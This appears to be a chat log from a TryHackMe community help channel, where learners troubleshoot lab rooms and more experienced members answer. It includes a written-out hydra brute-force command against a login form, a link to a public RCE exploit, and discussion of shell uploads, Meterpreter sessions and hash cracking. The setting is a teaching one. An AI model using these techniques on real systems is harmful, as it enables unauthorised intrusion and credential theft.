✅✅✅✅✅✅✅✅
I just waited again and ran the command starting a fresh from** msfconsole and I used the lsass.exe and it worked**

Congratulations 🎉🥳🥳 to me

👏

Thank you

Hey, I'm getting a wierd issue with the monikerlink room where "attacker" was not defined.

Google doesn't seem to know what I am taking about, and rechecked everything was copied over correctly. Bit lost.

Solved?: I works when you use python3 as the command but not python 🤷‍♂️ Bit wierd but whatever.

Your script might rely on features/ modules only available in the version used by python3

Hi

Is it recommended to remember or memorize all the vulnerabilities listed under OWASP Top 10?

You will practice it over time in CTFs , these are the most common vulns. 🙂

Got it. Was curious on how others would approach it

Thanks

The given URL under the OWASP Top 10, task 8 is not working
I tried both http and https but none of them are working

You're probably using wrong machine . Terminate that machine and start machine directly from the task you're in . That room has multiple different machines

I don't see any other machine except the first one under Task 2

Found it, I terminted the machine under task 2 and restarted it, and now it is working

Hello again! I find myself stuck: What hostname (subdomain) appears in the first DNS query? Tcpdump question.

Can you provide a shot of what you're trying to do ?

This is from the filtering expressions lab.

specify port 53 in your cmd (dns port)

Try to add -A flag for more verbose output

got it, thanks!

Gave +1 Rep to @woeful jungle (current: #1 - 4988)

Good day evryone, i am in Burp suite TASK 10 Take a look around the site on http://10.10.171.96/ — we will be using this a lot throughout the module. Visit every other page that is linked on the homepage, then check your sitemap — one endpoint should stand out as being very unusual! What is the flag you receive after visiting the unusual endpoint? NOW i cant see any unsuall endpoint that fits the hint: You are looking for a suspicious page with a name made up of a series of random letters and numbers.

disable interceptor in burp , it blocks your requests currently

I should disable interceptor after I made my request on Firefox?

yeah , go to proxy tab and disable it

Ok

Done same thing, can't find the url

I on the interceptor, made my request on Firefox, captured it on burp, then switched the interceptor

I don't think switching off interceptor is the solution, cus it had done it's work of intercepting the request, so no point switching it off

You then need to browsr through the site to build a site map , click on every link , visit every page , etc. 🙂

Ok

Did that and when I visited the either support or contact page, I got the url and the flag

Thank you for your help 🙏🙏

I'm on OWASP Top 10 Task 15 and I'm trying to upload the shell and it keeps saying this. Failed to write to the webserver. Is that meant to be part of the CTF because I'm sure I have done everything correctly

I solved it I missed the port SMH

Everything ok now ?

I'm pretty good at figuring things out and solving any issues I come upon, but wow did Task 5 of the Metasploit Exploitation room humble me for no reason 😂

Hi

For the GoBuster: The Basics room, I am trying to do the Task 6 but not getting any vHost matches after running the command shown in the screenshot.

Am I using a wrong wordlist?

use domain instead of raw ip

Tried this but got connection refused

Should I add the --domain flag too?

add -r <target-ip> to your cmd

connection refused again

Is it the server issues?

try to restart the target machine

okay

Restarted the target machine but still getting the same error

provide a shot of your hosts file

Do you mean this one? Or the hosts file itself?

add offensivetools.thm to your hosts file

okay

with the target machine IP address or localhost?

target ip

Worked, thank you!

Gave +1 Rep to @woeful jungle (current: #1 - 5014)

I have been facing an issue for sometime whenever I use hydra its shows me multiple correct password but when I try those none of them work, any ideas why its failing?

Something may be wrong with your command in that case . Can you provide some screenshots please 🙂 ?

hydra -l jake -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/login:username=^USER^&password=^PASS^:Errrrr" -V

It was supposed to pick a value around 40 from rockyou, but it stopped before it with multiple passwords showing as correct.

I watched a walkthrough, it also had same command and worked for them.

Fail condition must be denoted with F= . Also are you sure that the failed condition is just Error string ?

🔴🔴🔴🔴🔴🔴Good day everyone, Currently at cyberchef and the link to access the web based platform isn't working, I also tried downloading the file from GitHub, the url works but the file also not downloading

I prefer just having a web link to downloading so pls anyone with the correct cyberchef url should kindly send

works fine for me
https://gchq.github.io/CyberChef/

I was giving incorrect failed string.
thank you!
and fail condition works without F as well.

Gave +1 Rep to @woeful jungle (current: #1 - 5052)

Hello, i've got a problem in Hashing Basics : i'm doing the fourth task and i have to use raimbow tables like Crackstation.net or hashes.com to get the plaintext of 2 hashes. However, both websites didn't find anything...

To check by yourself :

Manually check the hash “4c5923b6a6fac7b7355f53bfe2b8f8c1” using the rainbow table above.

Crack the hash “5b31f93c09ad1d065c0491b764d04933” using an online tool.

and there's no salt

This can be done.

?

i can send you a screenshot

that it doesn't work

Okk I don't know where I got lost...

For the hash that starts with 4c59 you need to use a rainbow table.

hashes.com and crackstation.net are not rainbow tables ?

No.

damn, i'm so stupid it was right in front of me... thanks, i readed the question 3times before understanding lol

Gave +1 Rep to @tulip linden (current: #2 - 3794)

Thanks

Is there any really easy room we could use to practice 101 stuff? that would be cool.

Check this one 🙂
https://tryhackme.com/room/basicpentestingjt

awesome thanks

hey i need some help . where i can share error img ? room : Moniker Link (CVE-2024-21413)

you need to verify to post images

@boreal summit

Thnx

i already do that

then give it time to update, it might take a day

oh

oky

can you help me for that error ? dm ?

wrong verify

@boreal summit

yes

/verify

__

https://tenor.com/uYAUXSRIj2N.gif

Hi I’m starting my journey into cybersecurity and admire yall background. I’m looking for guidance from someone experienced. Would you be open to a quick chat or offering advice occasionally? Totally understand if you’re busy.

Welcome , good luck on your journey 🙂 . Feel free to reach out whenever needed 🙂

Thank you so much.

OWASP Top 10 - 2021 Task 15
What is the content of the /opt/flag.txt file?

I get flag but i wonder why python2 dont work but python3 does. In task 14 python2 was shown thats why im curious. Next thing is i found exploit online but a bit by accident. I found a message on discord that says that the header and footer should be "online book store v1.0" but when I use the inspect option I don't see anything like that.

Looking at the exploit its definitely been written for python3 since the room was created a few years ago its possible that the exploit used has been updated since python2 is no longer with us (RIP)

Although the header on it is dated 2020 and V1.0 so your guess is as good as mine 😂

Try with just python

Same as python2. I know it may be silly question but i like to understand (or at least think i understand 🤣 ) things before i move on.

You're using this one ?
https://www.exploit-db.com/exploits/47887

exactly

and modified it with nano, added url inside script

Try with python3

then it works, i know but i was wondering why python2 dosn't

Seems ok for me

python --version                       
Python 3.13.3

i think @wraith marsh is right ;p

im not getting rce after confirming it with "y"

im on attack box if it's important

I think there're some differences in string handling between python2 and python3

I used my own box, but I don't see why the attackbox would be any different

Yep, for starters they changed how print works between the two versions, and its 100% using the python3 print() function

ok, at least im a little bit smarter now and know i should use python3 😆 but still im not sure how would i find this exploit if not @woeful jungle comment from other chat on this discord

like im inspecting page and can't see anything about "online book store v 1.0"

https://www.google.com/search?q=online+book+store+exploit

ye i know, i just asking to get at least minimal grasp on how to actually find right exploit in the future

site:exploit-db.com <search term> on Google 🙂

i started with looking for cse bookstore and that was my first mistake here

Mistakes are just a precursor to learning

ye i know, but im still not sure if i would be able to find it without discord

I'm on the Windows PowerShell room. I've got to task 7 and I need to give the property which is retrieved by default by the Get-NetTCPConnection command. However, I only get 3 properties returned and none of these are the answer. I know what the answer is now as I've searched the web for it. But why is it not showing by 'default'?

Can you provide some shots please 🙂 ?

I think that Online Book Store CMS name should be in a webpage title

I dont think I have permission to send images? I think I have realised the issue though. The property is off the edge of the terminal display but I am not sure how to scroll sideways to view it...

Open up machine in full-screen view , press the leftmost button on the machine tray

I've closed the machine now, but I'll certainly remember this for next time. Thanks 🙂

Gave +1 Rep to @woeful jungle (current: #1 - 5145)

heloo everyone

Networking Secure Protocols

Task 8. Using WireShark I need to find the packet which contains login credentials. However, there are 468 of them. How do I filter these down to find the one I'm after? The hint does say which one, but how do I get to that answer without it being handed to me?

Follow streams

I dont understand wym by this. Also I have got the wireshark basics room coming up next, hopefully this clears some things up, but using it in the previous room was quite a leap compared to what I'm used to so far with THM

Right click on a packet > follow > http stream

Right clicking any packet will lead to me finding the login credential? Or would I have to find the corresponding packet first?

Following streams will show the whole http communication which that packet was a part of

I'm still not understanding

Maybe this article can help
https://www.wireshark.org/docs/wsug_html_chunked/ChAdvFollowStreamSection.html

This only allows me to view what was sent between the client and the server, relating to that specific packet. Which does show the login credentials but only if I know what packet to check. My problem was finding which packet, out of the 468, was the one containing the login credentials.
For example if I follow the http stream of packet 30. It does not show the login credentials as they are not contained in this specific stream. So my problem is how do I find http stream containing the login credentials without checking each individual packet manually nor by using the hint? Or are hints necessary in these cases?

You can then use the search feature in wireshark that will search for the specified keyword in all packets in the wireshark capture

Okay thanks, I appreciate the help. This feature wasn't mentioned in the room so I was a bit confused on how they wanted me to find the flag without giving much insight to how wireshark works 😅

Gave +1 Rep to @woeful jungle (current: #1 - 5161)

The metasploit section is awesome ! the second module and the fact you guys don't give it easely makes it really fun

and actually makes us learn the tool not just copy paste theory

Im just missing a bit a knowledge on how to scan for vulnerabilities for effectively 😛

That's where enumeration comes into play. 😀

Gotta research more about it 🙂 I just noticed my English was really bad yesterday 😛

Could Someone Help
Room : Gobuster : Basics
I Am trying to restart /etc/init.d/dnsmasq
but no such file exists on my kali vm

Try to add domains and subdomain from the task to your /etc/hosts file it should have the same effect

in the 5th task i have to enumerate subdomains but gobuster cannot find any

using the correct command

and everything

changed the /etc/hosts

and added ip_address www.offensivetools.thm

Try adding -r ip_address to your gobuster command, with ip_address being the target machine's. It should then use the target machine's DNS server to resolve host & domain names.

I have a question. Msfvenom is basically for when we want to create a payload that is in a certain format that we can deliver to a target machine to achieve for example a reverse shell.
But sometimes we are able to exploit a machine without having to deliver these payloads.
In real life when do we choose to use Msfvenom vs a direct exploit module?

Im sorry if my question sounds confusing.

You also need to add base domain offensivetools.thm to /etc/hosts

I’m so excited. I’m 88% done with cybersecurity 101. Five more rooms.

Congrats , keep up the good work 🙂 🚀

Already did that

anyways thanks

used the AttackBox

File is also present on Kali just under a different name

Anyone around to provide some assistance with Windows Powershell Task 7 Question 3? I could do this with a powershell script using WMI, but the module hasn't taught WMI. I'm trying to figure out the intended process for finding this answer.

Use the get-service command

yes.. I've done this. i've found the service name and display name, but i can't seem to tie those fields to a process ID without the use of WMI. google searches on the subject are also only showing the use of wmi. All examples I see of referencing a service by it's .Id attribute have failed.

Sometimes there are more detailed walkthroughs in Medium and im sure there is a article about that room

i see. i misunderstood the question. i thought i had to tie the displayname to the process name

can you provide a screenshot of what you're trying to do 🙂 ?

Moniker Link (CVE-2024-21413)

I need to send an email containing a Moniker link via a python script. I have copied the script and changed what's needed. I am getting an "Email delivered" confirmation message after running the script. However, when switching to the vulnerable machine, it doesn't seem to recieve any email. Kinda stumped on what to try here

What happens in your responder ?

I get these errors

That's before I even send the email though, that's just when I start responder

Yeah , you can ignore now , now click on the email

I did ignore them, but the email still wasn't being received

Provide shots of your script

Changed the receiver_email and server variables to include the IPs which the room stated. I did try changing the sender_email too. But that resulted in authentication errors when inputting the password

Attacker machine should be ip of your attackbox

Change that

Also don't touch receiver_email

Restart the machine and start with a fresh script

Now it's working thanks.

The line "Modify the Moniker Link (line #12) in our PoC to reflect the IP address of our AttackBox" is misleading as that's what caused me to change receiver_email initially

Yeah seems like author forgot to count comments above in overall line number 🙂

Ahh okay, thanks for the help though. Wouldn't know what to do without it 😂

Gave +1 Rep to @woeful jungle (current: #1 - 5199)

yo

on the Wireshark: The Basics

task 5

Use the "Exercise.pcapng" file to answer the questions.
Go to packet number 4. Right-click on the "Hypertext Transfer Protocol" and apply it as a filter.
Now, look at the filter pane. What is the filter query?

1089

that's the answer

but its saying its wrong...

can anyone look into it

@woeful jungle would you beable to help me?

Can you plase verify and provide some shots ?

I could not find an article, please try again.

yes ill averify

gimmie one sek 🙂

okay done

🙂

there you go

@woeful jungle any luck 🙂

Well you can see filter in the filter above 🙂

It's http

You're filtering only for http traffic

oh hahah well thank you

Gave +1 Rep to @woeful jungle (current: #1 - 5206)

its late T^T

thank you again KGB

on blue, i'm using the post/multi/manage/shell_to_meterpreter with correct lhost and session, but when i try to sessions -i 1 after successfully running the exploit, i still have the normal shell?

tried sessions -u 1 too!

Can you provide some shots

Type sessions -i

and provide a shot

nevermind worked after i tried running the exploit again!

thanks

Gave 1 Rep to kgbkp (current: #1 - 5207)

Hello, i am finishing cyber-security 101 and did not think to take notes of the rooms...
Any resources with it or places i can look for them?
thanks

I am unable to terminate the session which was expired as I was idle for too long. can someone help pls? - Room: Nmap: The Basics

try asking in the support channels maybe

hi, anyone can help me with the task 8 from room John the Ripper: The Basics, i didn't found the resolutions ---> What rule would we use to add all capital letters to the end of the word?

What's your answer ?

Where do I find the field in john.conf that I can change to make the last character uppercase? I have looked through the entire file and didn't find it, the answer requires that I respond with the name of the rule.

You can add line with your custom rule at the bottom of the file

it's ok, but the question is: "What rule would we use to add all capital letters to the end of the word?"

What's your answer ?

You don't need to look through john.conf, the answer you're looking for is below the header "How to create Custom Rules" in the Task. The key words you're looking for to form the "rule" from the question should be "capitals" and then to add them "to the end of the word" if I'm not mistaken.

I also thought this would be the answer, but it isn't either.

I think that's why KGB asked you for your answer in case you prefixed it wrong or something

kkk omg, my answer --> uppercase

thanks guys, now i undestand, sorry, the answer for this questions is a sintaxe for generate the rule

Is everything ok now ?

Hi guys, anyone knows why I am able to edit everyone's passwords and open AD with Phillip's account in Active Directory Basics Task 4?

Because you're logged in as admin right now